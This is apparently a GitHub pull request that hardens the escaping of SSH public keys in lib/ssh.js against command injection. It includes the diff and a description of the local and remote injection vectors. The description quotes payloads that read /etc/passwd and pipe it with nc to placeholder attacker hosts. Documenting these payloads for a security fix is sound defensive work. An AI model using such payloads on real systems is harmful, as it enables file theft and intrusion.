### PR TITLE
Prevent local and remote command injection in ssh.js

### DIFF
--- a/lib/ssh.js
+++ b/lib/ssh.js
@@ -100,9 +100,9 @@ exports.runScript = function(host, script, cb) {
 
 exports.addSSHPubKey = function(host, pubkey, cb) {
   // Add the key if it is not already in the file
-  var escapedPubkey = pubkey.replace(/(["'`\$\!\*\?\\\/\(\)\[\]\{\}])/g, '\\$1');
+  var escapedPubkey = pubkey.replace(/(["'`\$\!\*\?\\\(\)\[\]\{\}])/g, '\\$1');
   var destination = 'ec2-user@' + host;
-  var rcmd = 'grep "' + escapedPubkey + '" .ssh/authorized_keys || echo "' + pubkey + '" >> .ssh/authorized_keys"';
+  var rcmd = 'grep "' + escapedPubkey + '" .ssh/authorized_keys || echo "' + escapedPubkey + '" >> .ssh/authorized_keys';
   var args = ['-o', 'StrictHostKeyChecking no', destination, rcmd];
   child_process.execFile(ssh, args, cb);
 };
@@ -113,7 +113,7 @@ exports.removeSSHPubKey = function(host, pubkey, cb) {
   // (nb NOT the + sign)
   var escapedPubkey = pubkey.replace(/(["'`\$\!\*\?\\\/\(\)\[\]\{\}])/g, '\\$1');
   var destination = 'ec2-user@' + host;
-  var rcmd = 'sed -i "' + escapedPubkey + '/d" .ssh/authorized_keys';
+  var rcmd = 'sed -i "/' + escapedPubkey + '/d" .ssh/authorized_keys';
   var args = ['-o', 'StrictHostKeyChecking no', destination, rcmd];
   child_process.execFile(ssh, args, cb);
 };


### PR DESCRIPTION
## exports.addSSHPubKey

`exports.addSSHPubKey` uses string concatenation to build a command that adds public keys to `~/.ssh/authorized_keys` on a remote AWS host via SSH. The parent function passes in the AWS instance's IP address as `host`, which is extracted from a JSON object returned from an AWS API call. The `pubkey` parameter is the user-defined location of an SSH public key file. 

`pubkey` is presumed to be a text file with public keys separated by `\n` or `\r\n`, but there is no validation. If OS commands are inserted, this could be used as an OS command injection vector for the local host.

Attacking the awsbox host:

```
'; cat /etc/passwd | nc some_attacker_ip 1337 #
```

It's conceivable that someone would use this feature to upload a `pubkey` file sent by another (malicious) person. This could have the unintentional consequence of allowing that malicious person to get code execution on the uploader's computer.  
## 

OS command injection is also possible on the remote AWS instance: 

```
" err; cat /etc/passwd | nc other_attacker_ip 1337 # 
```

Though, this is probably a non-issue as the purpose of the tool is to allow remote root access to the AWS instance.

Cross-reference: https://github.com/liftsecurity/nodesecurity/issues/194 

---
## exports.removeSSHPubKey

`exports.removeSSHPubKey` uses string concatenation to build a command that deletes SSH public keys from `~/.ssh/authorized_keys` on a remote AWS host via SSH. The parent function passes in the AWS instance's IP address as the `host` parameter, which is extracted from a JSON object returned from an AWS API call. The `escapedPubkey` parameter is the user-defined location of an SSH public key file. 

`escapedPubkey` is presumed to be a text file with public keys separated by `\n` or `\r\n`, but there is no validation. If OS commands are inserted, this could be used as an OS command injection vector for the local host.

Attacking the awsbox host:

```
'; cat /etc/passwd | nc some_attacker_ip 1337 #
```

It's conceivable that someone would use this feature to remove a public key using a file sent by another (malicious) person. This could have the unintentional consequence of allowing that malicious person to get code execution on the uploader's computer.  

Cross-reference: https://github.com/liftsecurity/nodesecurity/issues/182
